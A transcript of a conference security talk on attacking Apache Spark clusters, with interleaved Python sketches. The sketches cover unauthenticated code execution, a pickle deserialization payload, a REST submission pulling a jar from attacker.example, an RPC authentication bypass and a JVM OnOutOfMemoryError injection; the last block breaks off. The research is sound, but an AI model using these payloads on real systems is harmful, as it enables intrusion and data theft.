Hello, everyone. Thank you for tuning in. Today we're going to talk about Apache Spark. We'll assume that while some of you may be familiar with the technology, a lot of you haven't had an actual chance to play with a cluster, so we'll take it from the beginning. We'll see how Spark works, what makes it so popular, review some common default settings, and obviously pick up some tools along the way to bypass authentication and execute code. Let's get going. Our story takes us back to 2008, when the economy was not much better than today's, Internet Explorer was still a thing, and the big tech companies were doing what they did best: quietly collecting the world's data. When you gather that much data, and I'm talking about terabytes and terabytes, performing even the simplest calculations becomes quite challenging. Now, you can either get a mainframe for half a million dollars, plus whatever it takes to get an intern to work on it, or you can distribute your files over thousands and thousands of servers. That way, your computations are small, though multiplied, and that's one way to handle the load. The standard way of doing so, I would say, is the Apache Hadoop framework. Now, if you've ever worked with Hadoop, you know that it's actually quite a hostile, very complex environment. Just to give you a quick example: first, you need to fragment your files using the HDFS file system, so you end up with multiple fragments of these files on multiple servers. Then you need to do coherent computations on these small fragments, so you need the MapReduce framework. But then you end up with thousands of processes running on multiple machines, so you need a way to schedule them; enter YARN. But then you want to do some SQL querying, so you need Apache Drill, et cetera, et cetera. So you end up with this plethora of tools, each with its own latencies, its own learning curve, and so on, just to cover all your needs in data analytics. To give you an example, this is what it takes to do a simple word count in MapReduce. This is the first page of Java, this is the second page, which is downright outrageous for a data processing solution, right? So in our story, we're around 2009, and there's this guy named Matei Zaharia, who was at Berkeley, I believe, at the time, who I imagine looked at this code and went, are you fucking crazy? That's not going to work. A word count is a simple operation; a word count should be done in five lines of code. And Apache Spark was born. Now, this is not the official story. The official story is that he was working on something called Mesos, which is a resource manager, and he invented Spark as a proof of concept, but I like my version better. Anyway, we'll go through the code later on, but right off the bat you can see that you can do pretty much the same processing that you would do in Apache Hadoop, except with 10 times less code in Spark, and it's also much faster. It's three times faster on 10 times fewer nodes, so it's 30 times faster. You see, Hadoop will flush everything to disk whenever it gets a chance, whereas Spark will try to keep everything in memory, and it was developed in an era where memory was getting cheaper and cheaper, so that kind of makes sense.
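Just to make that "five lines" claim concrete, here is what a word count looks like in PySpark; a minimal sketch, where the master URL and input path are placeholders rather than anything from the talk's slides.

```python
from pyspark import SparkConf, SparkContext

# Minimal word count sketch; "spark://master:7077" and the input path are placeholders.
conf = SparkConf().setAppName("wordcount").setMaster("spark://master:7077")
sc = SparkContext(conf=conf)

counts = (sc.textFile("hdfs:///data/input.txt")       # load the file as an RDD of lines
            .flatMap(lambda line: line.split())       # split each line into words
            .map(lambda word: (word, 1))              # pair every word with a count of 1
            .reduceByKey(lambda a, b: a + b))         # sum the counts per word across partitions

print(counts.take(10))                                # action: this is what triggers the computation
```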
But if you're running in a cloud environment where you pay for usage, having something that runs 30 times faster means it's actually 30 times cheaper. And that partly explains the gigantic boom in popularity of Spark among the big data companies. If you're serious about your big data processing at cluster scale, you will be using Spark for at least some part of it. And so, yeah, Spark boomed, was adopted by the Apache Foundation, and it grew to encompass many aspects of data analytics. SQL, streaming, machine learning, graph processing: you're covered. It's developed half in Java, half in Scala, but it also has connectors for Python and R, so, yeah, awesome. So basically, when you have this powerful framework, suddenly everything looks like a nail. If you're doing revenue prediction, you just hook Spark up to, I don't know, your Redshift cluster, pull down those financial statements, and do your computation. If you're doing fraud analysis, same thing: you hook it up to your Cassandra database, your S3 buckets, pull down those log files, and do your computation. So basically what I'm saying is that Apache Spark often sits at the junction of almost every important data store inside the company. And that's what made it interesting for me, because if you can access this tool, you're pretty much open to every database that's out there. How is it protected? How does it work? What is its security story, et cetera? And so I did what any sensible person would do: I went to the documentation on their website, I went to the security page, and lo and behold, I found this magnificent sentence that says security in Spark is off by default. Well, fuck me. And what does it do again? Oh yeah, it's this gigantic framework, a cluster of hundreds and hundreds of machines that have access to every database inside the company. And what does it do? Oh yeah, it does distributed data processing, or as I like to call it, distributed remote code execution. Sorry, but this was going to be fun. And I hope I've piqued your interest, because really that's what sparked the whole endeavor, no pun intended. And I hope I've got you interested enough to actually continue along this presentation, so we can explore how it works and some bugs that I found, right? Oh yeah, in keeping with DEF CON tradition, I think it's time for a drink. I should not do this online, but what the heck. So, to DEF CON Safe Mode, cheers. Yeah, that will kick in later. Anyway, so what is Spark and how does it work? I hope this is gonna be one take, because I cannot do that five times. So how does it work? As with everything in distributed processing, basically we start with a bunch of machines that we're gonna call workers. Now, these workers are basically just brainless machines that will execute whatever is sent their way. On each worker, you find a JVM process, a Spark process called an executor, and that's what does the actual execution. You can have many executors on each worker, and it's basically the number of executors that defines your power in terms of parallelism. So if you have 10 workers, and on each worker, each machine, you have three executors, you can run 30 tasks in parallel.
So yeah, you have some default HTTP port that gives a status of what's going on on the machine, not interesting, but you also have a random RPC port that is set for each executor, and it's this one that the rest of the cluster contacts in order to send and receive status from the worker. Now the worker is fine, but the most important piece, or one of the most important pieces, is the cluster manager, and that's our second component. The cluster manager's sole job is to schedule the applications, the work that is coming in, and say, oh yeah, this application is gonna run on these two workers, that one is gonna run on the other three workers. So it keeps the status of the workers: what they're doing, are they online or not, are they busy or not, et cetera. Every component inside Spark communicates using the Spark RPC protocol, which we will detail a little bit later on. And just to demystify this Spark cluster, this is what it looks like. This is the basic UI of the Spark master on port 8080. Sorry about that. You can see that we have two workers, one of which is dead, and we have an application that's running on two cores; since each worker has one core, this application is being distributed over two machines. But the most important part really is port 7077, because that's the one we're gonna contact in order to send an application, register it, and schedule it to be executed in parallel on these workers. And it's the basic hypothesis that we're gonna make throughout this presentation: that we have access to this specific port. Now the third component, and indeed the most important one, sorry, is the driver. The driver is really the brain behind the application orchestration. It's the one that's gonna slice up your application into small tasks, contact the cluster manager, receive the workers, send your workload to these workers, make sure that everything is going smoothly, and aggregate the results. And the driver, in a typical scenario, is gonna be running on your laptop. So you enter a network, you have the cluster manager running somewhere, you have the workers running somewhere else, and you write your application in Java, Scala, Python or whatever, boot up the driver, and send it to the cluster manager to be scheduled on the workers, hopefully to execute some code. So that's one setup that's kind of common. Right, so recon. Let's take this specific scenario that I just listed. Let's say you end up in a network and you wanna hunt for some Spark in order to exploit it; how would you go about it? Well, the first thing, I guess, if you're in an AWS environment, is you can simply use the API, if you have the proper access rights obviously, to look for every machine that has "spark master" or other keywords in its labels. Similarly, if you're in a Kubernetes environment, it's the same thing. But what if you end up in a more traditional network where you have to nmap the shit out of things? How can you find that cluster? Because you see, Nmap does not really support Spark. So we're in kind of a pickle here. The first thing we wanna do is be able to fingerprint Spark properly using Nmap. And to do that, I simply booted up a Spark cluster in my lab, put Wireshark in the middle, and analyzed the traffic. And if you do that, this is the blob that you're gonna see.
And basically the way to decompose this is fairly simple, and it's quite repetitive actually once you get to know Spark RPC. So this is the Spark RPC I was talking about. It always starts with the same thing, the same header, which is going to be, most of the time, 21 bytes of data followed by the payload, right? And these 21 bytes of data, the common header when you send Spark RPC commands, are composed of seven null bytes followed by two magic bytes. I call them magic bytes, but basically they depend on the RPC endpoint that you're trying to reach and the type of message that you're sending. In this case, I chose the example of the endpoint verifier's CheckExistence message, and its magic bytes are C305. If it's, I don't know, a worker sending a heartbeat message to the cluster manager, it's gonna be 2B0F or whatever; but in this case, it's C305. Anyway, it doesn't matter. Next, we have eight bytes of data, random data, you can put anything you want here; they'll just be echoed back by the cluster manager. And finally, we have four bytes giving the size of the data that's gonna follow, the payload. What is this payload? Well, you have a bunch of data, IP addresses that we don't care about, but the most important thing, the heart of the payload if you will, is this serialized object that you can see here. It's a serialized JVM object called CheckExistence. And if you look at the source code, CheckExistence is actually a class. Well, it's a Scala case class, but just think of it as a regular class, which is immutable and has some other interesting properties in Scala that we simply don't give a fuck about; but yeah, it's a class. So CheckExistence is a class and it has an attribute, name. So basically the client, the driver, is sending this serialized class to the cluster manager to see if there's an endpoint bearing the name that it sent, and the name that it sent is, obviously, master. So it wants to know if there is a Master RPC endpoint listening on the other end of the communication. And if that is the case, the cluster manager will respond first with 21 bytes of data; you can see it echoed back what we sent before, right, with a different pair of magic bytes, but anyway. And if there is indeed an endpoint, it sends a boolean that is set to true. So obviously I took this particular exchange because we can use it in Nmap to fingerprint the cluster manager, but you have to imagine that all Spark RPCs are these exchanges of serialized data prefixed with some type of header, either the 21-byte header or a 13-byte header that we will see a bit later on; this is the main way that Spark components communicate with each other, just serialized objects. So once we have this exchange all mapped out, we can write a Lua script that replicates the same thing. Once you deconstruct it like this, it becomes quite straightforward to do. So I wrote an Nmap script that's on my repo, sorry, and I will push it to the real Nmap repo once people have used it enough and debugged it enough. So yeah, now we are able to identify Spark clusters. And you can see they've been true to their promise: authentication is indeed disabled by default. So this is pretty great. Now comes the interesting part. Now we know how to locate Spark clusters inside the network; how can we execute code, right? Because that's what's really interesting.
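Before moving on, here is a rough Python sketch of the kind of probe just described, following the 21-byte header layout from the talk; the target host is a placeholder, and the payload would be the serialized CheckExistence blob captured with Wireshark, which I'm not reproducing here.

```python
import socket, struct

MAGIC_CHECK_EXISTENCE = b"\xc3\x05"   # magic bytes observed for the CheckExistence exchange
payload = b"..."                      # placeholder: serialized CheckExistence blob captured off the wire

header  = b"\x00" * 7                          # seven null bytes
header += MAGIC_CHECK_EXISTENCE                # two "magic" bytes (endpoint + message type)
header += b"\x41" * 8                          # eight arbitrary bytes, echoed back by the cluster manager
header += struct.pack(">I", len(payload))      # four bytes: size of the payload that follows

s = socket.create_connection(("spark-master.example", 7077), timeout=5)
s.sendall(header + payload)
print(s.recv(4096))    # a response echoing the header and containing a "true" boolean suggests a Spark master
```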
Now, the standard way of submitting an application onto a Spark cluster is basically: you write your application in Java or Scala or what have you, you package it as a JAR file, you boot up the driver, and then you send that JAR file to be executed, or parsed if you will, by the cluster manager and the workers. Now the problem is this: I find writing Java boring, sorry, and Scala makes me want to shoot myself. So I decided to do it in Python. And luckily, Spark supports Python. In fact, they have an official wrapper called PySpark which takes care of all the nasty bits I just described. It will boot up the driver for you, it will translate Python objects into JVM objects and vice versa and send them, and it will take care of all the nasty bits for you, so you just write simple Python. And yeah, PySpark, if you've ever installed it, really is just a thin wrapper: it downloads 200 megabytes of JAR files behind the scenes, so it's hilarious. Anyway, from PySpark we import these two classes, SparkContext and SparkConf. It's very straightforward, very intuitive, I would say. You define the configuration: we're gonna name our application word count, and we're gonna point to the cluster on port 7077, obviously. Now, you have to define your IP, the public IP that you're gonna bind on; we're gonna see why later. Nowhere does the documentation say so, but if you forget this line, it will not work. Anyway, then you define the Spark context. The SparkContext is gonna be the client that initiates and handles the communication with the cluster manager. And basically, when the Python interpreter reaches this line, it will boot up the JVM process we talked about, the driver, and it will initiate communication with the cluster manager. So, quite naively and quite intuitively I would say, what we wanna do next is obviously just write the code that we want to be serialized and executed on the worker. So: from subprocess import Popen, run the id command. And if you do that, and this is really the first thing that I did, it actually works. So I got this result back and I was like, well, hang on. I know that user, that's me. I have that user defined on my local machine, not on the worker or the cluster machines. What the fuck happened? So it turns out I had actually just executed the code on my own machine. So I looked at Wireshark, because I was curious what the fuck happened; I thought this stuff was supposed to serialize the command and send it to be executed on the workers. Well, what happened was: first we send the 21 bytes of data, the CheckExistence class, yada yada, everything's all right, there is indeed a cluster manager listening. Then we send the RegisterApplication class, which contains all the information about the application that we're going to run. So you can see that we send "word count" plus other properties, right? The cluster manager responded with an ExecutorAdded class; it actually gave us two workers. So this is great. What happened next? Well, the driver, our instance of PySpark, simply unregistered the application and called off the whole thing. So what the hell? Well, remember when I said that PySpark will simply serialize whatever comes after the SparkContext line? Yeah, I lied. The thing is, in order to understand what happened, we basically need to talk about two concepts, which we'll get to in a moment.
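Before we get to those two concepts, here is roughly what that naive first attempt looks like in PySpark, reconstructed from the description above; the master address and driver IP are placeholders, not values from the talk.

```python
from pyspark import SparkConf, SparkContext
from subprocess import Popen, PIPE

conf = (SparkConf()
        .setAppName("wordcount")                     # application name shown in the master UI
        .setMaster("spark://10.0.0.5:7077")          # placeholder: cluster manager RPC port
        .set("spark.driver.host", "10.0.0.99"))      # placeholder: our reachable IP; omit this line and it breaks

sc = SparkContext(conf=conf)                         # boots the driver JVM and registers with the master

# Naive attempt: this runs locally on the driver machine, NOT on the workers,
# because it never becomes part of the execution graph (DAG).
print(Popen(["id"], stdout=PIPE).communicate()[0])
```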
First of all, Spark APIs, and second, the notion of a DAG and lazy evaluation in Spark. So, Spark APIs: contrary to what you might expect, Spark APIs are not methods, they're data structures. Let's say you wanna open a file in Python or Java or Scala or whatever: you point to a file and you call the open method. This will only give you an object, a Python object, a handle in memory, whatever, but a single-threaded object nonetheless; there is no parallelism there. The proper way to do it in Spark, and still get that parallelism, is to call the textFile method of the SparkContext class. Here sc is an instance of SparkContext. So you point to a file, you call the textFile method, and textFile will grab that file, slice it into, say, two fragments, and then load those two fragments in memory. Similarly, if you wanna load a list, you don't just define a list like that; that will give you only a single-threaded object in memory, no. You need to call the parallelize method, which will take that list and slice it in half, or in three or four, however many pieces Spark deems necessary. And that way you end up with fragments in memory on which you can perform work in a parallel fashion. Now, these fragments are called partitions. This is a very frequent term in Spark that will come up a lot; partitions are the main unit of work inside Spark. And these collections of partitions are called resilient distributed datasets, RDDs, which is really the most fundamental API in Spark. There are others, but they're ultimately all based on RDDs at the core. So once we have these partitions, we can apply parallelized work using things called transformations and actions. Now, what's a transformation? Let's say I wanna multiply every element of a list by 20; a concrete example will make it clearer. So I define a method called multiply which takes an element and multiplies it by 20. And then I just call the map transformation, which will iterate over every element in every partition and yield the same number of elements in the same number of partitions. That's a transformation. There are other types of transformations which may or may not yield the same number of partitions and elements, by the way. So yeah, each Spark API basically defines these transformations and actions to work with. And here's the thing: if I write this code thinking that I just multiplied every element by 20, actually nothing gets sent to the workers just yet. Nothing happens, nothing gets computed; I would expect the same result as earlier, but in fact I would have nothing. Why? Because when the driver starts parsing this application, all it does is build an execution graph. This execution graph is called the DAG in Spark terminology. Basically, all it does is follow all these calls that we made. So, oh yeah, it knows that it's gonna call parallelize, so it knows that it's gonna build an RDD; it doesn't care what's inside, it just knows that it's gonna build an RDD with X number of partitions. Then, oh yeah, we're gonna call a map; it doesn't care what's inside the map, it doesn't care that we're gonna multiply every element by 20, that's not the driver's job. The driver's job is only to build this execution graph. So it knows that it's gonna apply a map, and given a set number of partitions, it's gonna have the same number of partitions in output. And it's gonna continue building up this DAG.
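To ground that multiply-by-20 example in code before we continue with the DAG, here is a minimal sketch; note that after the map call nothing has actually executed yet, which is exactly the point being made here. The local two-core context is just for the demo, not anything from the talk.

```python
from pyspark import SparkContext

sc = SparkContext("local[2]", "lazy-demo")    # local two-core context, just for illustration

def multiply(x):
    return x * 20

rdd = sc.parallelize([1, 2, 3, 4, 5, 6], 2)   # an RDD with two partitions
result = rdd.map(multiply)                    # transformation: only extends the DAG, nothing runs yet
```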
Maybe there's gonna be a flatMap, which is another type of transformation, et cetera, and it's gonna continue building this graph until it hits an action. An action in Spark is something that forces it to do the actual computation. Think saveAsTextFile, or collect, or takeSample: all these methods that you can call on an RDD that force it to actually produce values. And once you call a collect, or any action in Spark, then and only then will the graph be sent to the executors. The graph, mind you, not the code. Simply the graph. And it goes a little bit like this: the driver sends the execution graph to the workers. The workers go through this graph and they go, oh, I need to parallelize, but I don't have that list; you know what, give me that list, and the driver sends all these serialized objects one after the other. I need to do a map, oh, but I don't have the multiply function; so they ask the driver to serialize the function, the method, and send it over, et cetera. And then they apply those methods. Each worker will only apply these methods, will only follow the DAG, on its own partition. So worker number one will loop through the elements of the first partition, one, two, three, multiply by 20, get 20, 40, 60, and send back the result; worker number two will do the same, and the driver will aggregate the results and present them to the operator, us. So when you think about it this way and you go back to our earlier code, with our subprocess call just sitting there, naked and alone in the wilderness, well, of course it didn't make it to the workers. The workers are only ever aware of the DAG. So if we want to execute code, we need to somehow embed it inside the DAG; we need to put it inside a transformation, hence the following code. Here you can see we define a lambda, an anonymous function, and inside it we put our Popen command execution stuff. And obviously we need to follow it with an action, otherwise nothing gets sent. This is the basic skeleton you need to follow in order to achieve code execution on Spark across multiple machines; there's a rough sketch of it at the end of this passage. Now, if you don't want to be bothered with creating RDDs, handling parallelism and whatnot, I took that skeleton, dressed it up a bit, and incorporated it into a tool called Sparky that will take care of all this stuff for you. You just point it at a cluster, give it the IP that you want to target, the command that you want to run, and how many workers you want it executed on, and it will do the rest: it will build the RDDs and call the right transformations and actions in order to achieve the execution that you want. And this is what it looks like. Again, I'm gonna publish it on GitHub for everyone, so you'll have a chance to look at the code. You can see here, we just point to the cluster, we specify our public IP address, the command that we want to execute, and the number of workers that we want to target, and you can see we get execution on three machines, great. I also embedded some scripts to make it easy to run in an AWS environment, to dump AWS secrets if you want, or to search for files that are sometimes dumped by Spark in its work folder.
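Here is that rough sketch of the lambda-plus-action skeleton; it's a reconstruction from the description above, not Sparky's actual code, and the master address, driver IP, command, and worker count are placeholders.

```python
from pyspark import SparkConf, SparkContext
import subprocess

conf = (SparkConf()
        .setAppName("totally-legit-analytics")        # placeholder application name
        .setMaster("spark://10.0.0.5:7077")           # placeholder cluster manager
        .set("spark.driver.host", "10.0.0.99"))       # placeholder driver IP
sc = SparkContext(conf=conf)

num_workers = 3
cmd = "id"                                            # placeholder command

# One partition per desired worker; the command lives inside a transformation (map),
# so it becomes part of the DAG and gets shipped to the executors.
rdd = sc.parallelize(range(num_workers), num_workers)
results = rdd.map(
    lambda _: subprocess.check_output(cmd, shell=True).decode()
).collect()                                           # action: forces execution on the workers

for r in results:
    print(r)
```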
With those helper scripts you can search for AWS keys or secrets or whatever; it automates a lot of the pentesting work on Spark. So yeah, that will get you started. Next: with this type of execution that I just showed, there are some problems that are quite annoying. Let me go through them very quickly. First of all, the Python version on the driver needs to match the one on the worker, down to the minor version, otherwise it will throw an error. You can see that even if you have a worker that's on 3.5 and your driver is on 3.7, you're kind of screwed. Now, there's a way around it. Since the check is simply done by comparing the version info, you can just override it; you can see here that I set it to 3.5. And if you do that, it will work, so long as there's not too much of a gap between the two versions. So you can get away with 3.6 against 3.7, because the serialized objects are similar to some extent, but you cannot get away with 3.4 against 3.7, there's too much of a gap. And the way around that is to override the version as before, but also to take advantage of the fact that PySpark uses the pickle serializer to deserialize objects. And in pickle, you can specify a method: if you define the __reduce__ method of an object, the call it describes gets executed during deserialization. So before the deserialization process fails later on, it will already have executed the command embedded via __reduce__. So you simply need to define such an object, send it as part of the job, and it will get you through: even though the job submission fails, you still achieve code execution on however many workers you decided. I did not incorporate this into Sparky because it's just a hacky trick; really, the easiest way is simply to align your version of Python with that of the workers, but oh well, it's a fun trick to share. But really, the most annoying problem is a network problem. See, what happens when we register an application is that the driver contacts the cluster manager on RPC port 7077, as we just saw, and sends the RegisterApplication class along with the parameters, the application's name, et cetera. The cluster manager receives the application: oh yeah, I need three, four workers, whatever; it fetches the workers and sends them to the driver along with some status data. But then, just when you would think it would be the driver's job to contact the workers, it's actually the workers who initiate the communication towards the driver. They will be the ones contacting the driver, on a random RPC port, the scheduler port, to say, hey, we're ready, et cetera. And that's annoying, because you don't necessarily have this flow of communication open: the driver, your computer, is usually behind NAT or whatever, so you're screwed. Not only that, the workers will initiate another communication on another port altogether, the block manager port, in order to receive data blocks, request serialized objects, broadcast variables and whatnot. So that's annoying. In Sparky, I default these settings to some common ports, so it works in some setups, but not all. But really, the solution is to use what's called cluster mode, where you don't run the driver on your laptop; more on that in a second.
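Coming back to that pickle __reduce__ trick for a moment, here is a minimal sketch of the idea, under the assumption described above that the executors unpickle whatever the driver ships; the master address, driver IP, and command are placeholders, and this is not the exact payload from the talk.

```python
import os
from pyspark import SparkConf, SparkContext

conf = (SparkConf()
        .setAppName("version-mismatch-poc")
        .setMaster("spark://10.0.0.5:7077")            # placeholder cluster manager
        .set("spark.driver.host", "10.0.0.99"))        # placeholder driver IP
sc = SparkContext(conf=conf)

class Exec(object):
    """An object whose unpickling runs a command (placeholder: touch a marker file)."""
    def __reduce__(self):
        # pickle records "call os.system(...) to rebuild this object"; that call runs
        # when an executor unpickles the element, even if the task later dies on the
        # Python version check.
        return (os.system, ("touch /tmp/poc",))

# The instances are pickled on the driver and unpickled on the executors.
sc.parallelize([Exec()] * 3, 3).count()
```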
So, cluster mode: you simply contact the cluster manager on port 7077, and you tell it, here's the application to execute, and please also set up the driver on your own cluster. And that works pretty well: in this case, you only need access to port 7077. The downside is that you cannot use PySpark, you cannot use Python. So I had to redo that skeleton I showed you earlier in Python, but this time in Scala, to build a jar file that will parallelize and execute whatever command you give it across however many servers you want. The code is again on GitHub, but you don't need to touch this one; it's a compiled jar file, so you can just use it as it is. So here's a quick example. You can see we host this jar file that I just showed you on a server that is reachable by the workers, and we simply use Sparky again to build the command to register this in cluster mode. So we just point to this jar file and the command we want to execute, and then we don't need any network conditions except for that port 7077 to reach the cluster. And it works pretty well; it will even auto-delete itself, so you don't have to worry about that. So this gets us through the network thing. These are the main ways I found to execute code on a Spark cluster that has no authentication, which is the default. Anyway, let's go explore some other facets of Spark. There's this interesting interface, the REST API. It is interesting because, when you go through the documentation, you can see that it's available on port 6066, and according to the documentation, it's really a read-only, boring API. I was like, yeah, whatever. And I remember a few days later, I was digging through the source code, really lost amongst weird Scala stuff, functions, options and whatnot, and I saw this keyword: REST. I'm like, oh my god, I know what that is. So I grabbed it and followed it, and I came across this piece of code that says something like submit request, create. I was like, I like to submit stuff, I like to create stuff, let's see what these things do. And you follow this CreateSubmissionRequest, and there's talk of appResource, mainClass. Well, hang on, appResource usually references a jar in Spark code; I thought this was a read-only API, what the hell is going on? So I followed this CreateSubmissionRequest and I came across it: appResource is the application jar. So basically, even though the documentation says the REST API is read-only, in the code it actually accepts a jar file that you can send it, which is kind of amazing. So all you have to do is build a JSON file, since it accepts JSON input, with the right properties, appResource, mainClass, sparkProperties and so on, and then you can send your jar file and achieve code execution. And we can take that jar file we used earlier, simple-app.jar, and pass it the command argument; it just accepts commands to execute in base64. So this is, I think, a whoami or, no, not a whoami, a touch of some file in some folder, base64-encoded, very simple. And yeah, you set the different properties and you can just curl this payload to it, and it will execute code, as simple as that. And this is just to show you what it looks like. Again, if you use this method, you don't need the driver to run on your machine; it's gonna run in the cluster, in cluster mode.
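For illustration, a submission along those lines could look roughly like this; the field names follow the CreateSubmissionRequest structure as I understand it, and the host, Spark version, jar URL, main class, and command are all placeholders rather than values from the talk.

```python
import base64, requests

# Sketch of an unauthenticated submission to the standalone REST API on port 6066.
cmd = base64.b64encode(b"touch /tmp/pwned").decode()      # placeholder command, base64-encoded

payload = {
    "action": "CreateSubmissionRequest",
    "clientSparkVersion": "2.4.5",                         # placeholder version
    "appResource": "http://attacker.example/simple-app.jar",   # jar reachable by the cluster
    "mainClass": "SimpleApp",                              # placeholder main class
    "appArgs": [cmd],                                      # consumed by the jar
    "environmentVariables": {"SPARK_ENV_LOADED": "1"},
    "sparkProperties": {
        "spark.app.name": "SimpleApp",
        "spark.master": "spark://10.0.0.5:6066",
        "spark.submit.deployMode": "cluster",              # driver runs inside the cluster
        "spark.jars": "http://attacker.example/simple-app.jar",
        "spark.driver.supervise": "false",
    },
}

r = requests.post("http://10.0.0.5:6066/v1/submissions/create", json=payload)
print(r.status_code, r.text)
```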
And one thing I will mention: if you decide to use the REST API, or cluster mode in general, you can send whatever jar file you want, you don't have to use my specific jar file. But while you will get execution on one worker, if you wanna execute on 200, 300, all the workers inside the cluster, then you need to use the Spark APIs, some version of what I just showed in the Scala or Java code earlier. So anyway, this was fun and all, but I wondered whether anybody had blogged about it, so I Googled CreateSubmissionRequest, and the first result on Google was this script; it was already published. And I was like, fuck, so close. Not only that, there was actually an exploit already published, a Metasploit module, published by these fine gentlemen. I was like, damn it. Sometimes you keep your head down in the weeds and you forget to do basic research, but it was just months apart. Anyway, let's get to the real stuff, right? Authentication. Let's say you come across a cluster that has all the right switches on, so it has authentication enabled. The way to do that in Spark is fairly easy: you set spark.authenticate to true and then you define the secret that you can see here, and you need to do that on every component inside the cluster, every worker, the cluster manager, and the driver, so that they all have a shared secret to communicate with. And if you have an authenticated cluster and you try to communicate with it, you get this delightful error: you send the CheckExistence class and you get an IllegalStateException, expected SASL message. Now, SASL is an authentication framework, a challenge-response protocol based on a shared secret, as you might have guessed. Basically, the server sends a nonce to the client, the client hashes the secret with the nonce, and then sends the response plus other parameters that we will see; fairly simple. But the funny thing is that even when you configure the driver to use the secret and tell it to authenticate, it will first attempt an unauthenticated session: it will first try CheckExistence, get slapped with this error, and only then try an authenticated exchange. So it's kind of weird. Anyway, what does an authenticated session look like? Well, first the driver sends 21 bytes of data, the usual header with the magic bytes, this time set to 2B03 as opposed to the C305 we saw earlier, followed by random bytes that we don't care about, and the size of the payload, which is definitely wrong in this case, it's not 176 bytes. But anyway, the most important thing in this authentication sequence is that it sends the Spark SASL user, which is the user used in the challenge calculation. The cluster manager responds with 21 bytes of data as usual, the header, followed by the SASL parameters needed to perform the challenge computation. So you have the nonce, a random value, the realm, the QOP, which says whether we're doing authentication or encryption or both, the delightful cipher algorithms to use in case we're doing SASL encryption, and, just to reassure you, Spark does not use SASL encryption by default, it uses AES, but it's definitely possible to fall back to it, and finally the algorithm, and this one is indeed used to calculate the hash.
The calculation of the hash, honestly, you're not gonna do it by hand; it's detailed in RFC 2831. But roughly: you take a bunch of data, hash it with MD5, take the output, combine it with the nonce and other stuff, then hash other pieces of data, and combine everything, which gives you the response to the challenge. Again, if you wanna know more about it, Google RFC 2831. So, the driver sends the response to the cluster manager, and if everything checks out, the cluster manager acks. Right. And then it can follow the classic flow of communication: CheckExistence class, RegisterApplication, RegisteredApplication, ExecutorAdded, yada yada. Now here's what bothered me, what ticked me off a little bit: this authentication step was only ever done when the RPC communication was prefixed with those 21 bytes of data. But it turns out there's another header that is sometimes sent in front of payloads, and this header is only 13 bytes long. It's usually sent in the middle of the TCP stream, inside the same TCP session, so I did not have much hope; I was like, well, maybe the cluster actually remembers that this is an unauthenticated session, so that's why, et cetera. But nevertheless, I thought, you know what, let's see what it looks like if we start the communication from here. So we don't send the CheckExistence message, which prompts the authentication exchange; we just start the communication by sending these 13 bytes of data followed by the RegisterApplication, because that's what we really care about, right? We want to submit an application, that's what we really want. So if you begin the communication at this stage, you first send 13 bytes of data. It looks awfully similar to the 21-byte header, but basically, sorry, you have four null bytes, followed by four bytes giving the size of the payload plus the header, so the size plus 13, then the magic byte, nine, which didn't change for some reason, and four bytes which are the actual size of the payload. And then you send the serialized RegisterApplication with all its attributes, the application's name, yada yada. And I sent this, and I was expecting a massive error, like those 100-line JVM stack traces, but instead I got a header back followed by a RegisteredApplication class. And I was like, is it me, or is it just possible to bypass authentication? I was like, hallelujah, it's amazing. Now, bypassing authentication is fine, but what can we do with it? Because I was not going to recreate the 80 messages that follow next, that's not possible. So what can we do with just one message? Well, if you look back at how Spark works, the RegisterApplication class is the one that prompts all that workload on the cluster manager: it's gonna contact the workers and say, hey, I've got an application for you, you better get ready, spawn those executors and get ready to take the work. So I went over to the workers and I replayed my message, hoping to see some process spawned or whatever, but I didn't see anything. And the reason for it, which I figured out a couple of days later, was that when you send this payload, the serialized RegisterApplication, the cluster manager receives it, but I immediately shut down the connection, my program terminated.
So the cluster manager did not have enough time to actually contact the worker, spawn the process, and let it do its thing; no, I had immediately shut down the connection. The way around it, in order to give it time, is simply to sleep, as simple as that. You send the RegisterApplication, you sleep for five seconds, and that way you give the cluster manager enough time to contact the worker, spawn the executor, and do its work. And once you add that sleep, well, I had put a watcher on the worker, monitoring for processes, and I saw this process getting started. And the magnificent thing about it was that it took, as a parameter, something that I was defining inside that serialized RegisterApplication: the block manager port, set to 8443. And I knew it was me, because I'm the one who set it, in order to have communication come from the worker to the driver. So I thought: okay, authentication bypass is a sure thing, and remote code execution is a definite maybe, because you can influence parameters that are used to spawn a process, so maybe there's some injection there. So I turned to this RegisterApplication class to see what's inside, what we can define as parameters, as options that we can take advantage of. RegisterApplication, again, is a case class which extends DeployMessage, which implements the Serializable trait; we don't care about that. ApplicationDescription, what does it contain? Okay, so if you're like me, you're gonna ignore all this shit and go straight to Command, right? Because the Command case class has the main class, which is the class of the executor to be launched, and we cannot override that. It has arguments, environment variables, a bunch of parameters. Now, if you just wanna inject, like, a semicolon or an ampersand or a pipe, it will not work, because these parameters are sanitized. So we need a more clever way of hijacking the execution, and the way to do it, the easiest way I found at least, is using the Java options. Now, if you're familiar with the JVM, you know that you can specify options to control the behavior of the JVM: which garbage collector to use, how strings should be compressed, the amount of heap memory, et cetera. Well, it turns out that if you dig into the hundreds and hundreds of Java options, there is one that allows code execution. So yeah, this is an example of a JVM option, and the one that allows code execution is called OnOutOfMemoryError: you just specify a command that it will execute. The catch is that it only executes it if there's an out-of-memory error, like its name says. So if the executor process fails to allocate heap memory, it throws this error and then executes the code. So how do we make the executor trigger this error? Well, a simple way is to add another JVM option, -Xmx, which sets the maximum amount of heap memory, and set it to something tiny like one or two megabytes. Once you combine these two options, you have your code execution. So ideally we'd like to do something like this. Obviously we cannot do it through the normal code path, because the driver would attempt to authenticate, which is no good, and anyway you cannot set -Xmx for the executor from inside the driver like that. So we really need to forge that serialized object by hand, embed these options in a properly serialized RegisterApplication, and send it to the cluster manager. And again, the easy way to do it is using Sparky.
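To make the shape of this concrete, here is a rough sketch of what such a forged submission could look like, combining the 13-byte framing and the two JVM options; the serialized RegisterApplication blob itself is left as a placeholder (in practice it has to be forged byte by byte, which is what Sparky automates), and the host, port, and command are illustrative.

```python
import socket, struct, time

# The two JVM options smuggled into the executor command line:
#   -Xmx2m                      -> the executor is all but guaranteed to hit an OutOfMemoryError
#   -XX:OnOutOfMemoryError=...  -> command the JVM runs when that error is thrown
java_opts = "-Xmx2m -XX:OnOutOfMemoryError='touch /tmp/pwned'"

# Placeholder: a hand-forged, serialized RegisterApplication embedding java_opts
# in its ApplicationDescription/Command fields.
payload = b"..."

frame  = b"\x00" * 4                              # four null bytes
frame += struct.pack(">I", len(payload) + 13)     # payload size plus the 13-byte header
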